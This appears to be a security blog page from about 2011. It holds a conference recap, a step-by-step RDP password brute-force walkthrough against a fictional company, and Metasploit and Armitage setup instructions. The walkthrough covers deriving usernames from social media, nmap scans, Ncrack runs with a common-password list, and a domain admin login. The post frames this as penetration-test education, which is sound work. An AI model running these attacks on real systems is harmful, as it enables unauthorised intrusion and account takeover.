Eclectic Security

Chicken saltimbocca with prosciutto and a leaf of sage  - http://en.wikipedia.org/wiki/Saltimbocca
Hummus - http://humus101.com/EN/category/hummus/
Green salad

I attended the Croatian Linux Users conference last week were I gave a Lightning talk about Smooth-Sec, despite it was a short talk I had the chance to describe the main features of the distribution. I have underlined how easy is to install and deploy Smooth-Sec, describing also the clear and  intuitive data  visualization provided by Snorby and the power of Suricata IDS/IPS. I also talked about other possible Smooth-Sec usage as Malware analysis tool, System and network forensics and learning platform (pen test labs or Info Sec classes). The conference was filled with lots of interesting lectures, one special guest was Mark Shuttleworth that gave a keynote on varius topics, from his experience into space, to the importance of the free software communities, the future of Ubuntu and how to develop sustainable business models with open source and free software. Dorscluc is a great event and well organized, and gets better every year, see you there in 2012.

Below you can find my slides.

Smooth-Sec – Ready to Go Linux Solution for Information Security

Photo by akeg

DISCLAIMER
All information provided are for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). Tools and techniques demonstrated may be potential damaging if used inappropriately. All characters and data written on this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such SSH and VNC are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we already tried all the available remote attacks with no luck. We tried also to ARP poisoning the LAN looking to get user names and passwords, without succeeding. From a previus nmap scan log we found a few Windows machines with the RDP port open and we decided to investigate further this possibility. First of all we need some valid usernames in order to guess only the passwords rather than both. We found the names of the IT guys on varius social networking websites. Those are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

Didn’t take long to create valid usernames following the common standard of using the first letter of the name and the entire surname.

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required:

Linux machine, preferably Ubuntu.
nmap and terminal server client, sudo apt-get install tsclient nmap  build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet .http://nmap.org/ncrack/

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out what hosts in a network are up, and save them to a text list. The  regular expression will parse and extract only the ip addresses from the scan.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks

nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine

We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.

vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine.

ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.

Run the terminal server client from the Linux box

tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!

At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.

Final remarks.

For the penetration testers: don’t give up at first hurdle, there’s always another way to break in .

For the IT staff: Lack of password policy enforcing complexity and strength lead to a disaster.

Metasploit version 3.7.0 is available for download, this new release comes with a significant number of improvements. One of the most important updates is the session management, now metasploit is capable to handle hundreds of  sessions, this come handy when running large-scale social engineering engagements. Along with this update, other long-awaited features has been added, pass-the-hash and stolen password attacks against Windows 2008 and NTLM authentication support to the Microsoft SQL Server driver are the most important. As bonus, this release is shipped with 35 new remote exploits, check it out.

Here you can see how to install Metasploit and Armitage from scratch with the postgresql support on Ubuntu 11.04.

Metasploit installation

wget  http://updates.metasploit.com/data/releases/framework-3.7.0-linux-mini.run

install the metasploit framework

chmod +x framework-3.7.0-linux-mini.run

./framework-3.7.0-linux-mini.run --help

./framework-3.7.0-linux-mini.run

#run the metasploit update

msfupdate

Postgresql and dependencies installation

apt-get install postgresql pgadmin3 libpq-dev sun-java6-plugin ruby rubygems libreadline-dev libssl-dev libpq5 ruby-dev nmap

gem install pg

#Metasploit database and a user creation

su postgres
createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

createdb --owner=metasploit metasploit

#Run the msfconsole  and run the following commands
#msfconsole
msf> db_driver postgresql
msf> db_connect metasploit:metasploit@127.0.0.1:5432/metasploit

The msfrpcd must be started,

msfrpcd -f -U metasploit -P metasploit -t Basic

And now is time to start armitage:

/opt/framework-3.7.0/msf3/armitage

Please check the correct postgresql credential, and press connect.

User: metasploit
Password: metasploit
DB connect string: metasploit:metasploit@127.0.0.1/metasploit

In a in a couple of seconds Armitage  should appear.

On Armitage, go to Hosts > Nmap scan > Intense Scan > Input a subnet of interest and happy hunting !

Note: In case you get the error: The address is already in use (0.0.0.0:55553) , please check the process that is keeping the port 55553 busy. You can do it easily running the command lsof -i :55553 .

COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.ruby.bin 5538 root    4u  IPv4 154865      0t0  TCP *:55553 (LISTEN)

At this point you need to kill the process by his own PID, in this case kill -9 5538, and restart again the msfrpcd with “msfrpcd -f -U metasploit -P metasploit -t Basic”

This is a selection of books that every pen tester or infosec person need to have on the shelf. Other valuable books are available on the topic, but this are my favorite.  A particular mention goes to the guys behind the Social Engineering framework project and the related book, for their invaluable work on pwning humans. Happy reading and Hacking !

BackTrack 4: Assuring Security by Penetration Testing

BackTrack 4: Assuring Security by Penetration Testing is a fully focused, structured book providing guidance on developing practical penetration testing skills by demonstrating the cutting-edge hacker tools and techniques in a coherent step-by-step strategy. It offers all the essential lab preparation and testing procedures to reflect real-world attack scenarios from your business perspective in today’s digital age. www.packtpub.com

Social Engineering: The Art of Human Hacking

Social Engineering: The Art of Human Hacking has been unanimously voted as the official book on social engineering. Based on the Web’s first official Framework for Social Engineers, this book delves into aspects of human thinking that has not been discussed in previous social engineering books. Many readers have stated it should be used in college as a text book on both human vulnerabilities and psychology. With in depth discussions into body language, hand gestures, the scientific part of NLP and microexpressions Social Engineering: The Art of Human Hacking has been dubbed a “seminal work” in the infosec community. www.social-engineer.com

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

Thomas Wilhelm has delivered pen testing training to countless security professionals and now through the pages of this book you can benefit from his years of experience as a professional penetration tester and educator. After reading this book you will be able to create a personal penetration test lab that can deal with real-world vulnerability scenarios.

Penetration testing is the act of testing a network to find security vulnerabilities before they are exploited by phishers, digital piracy groups, and countless other organized or individual malicious hackers. The material presented will be useful to beginners all the way through to advanced practitioners. www.syngress.com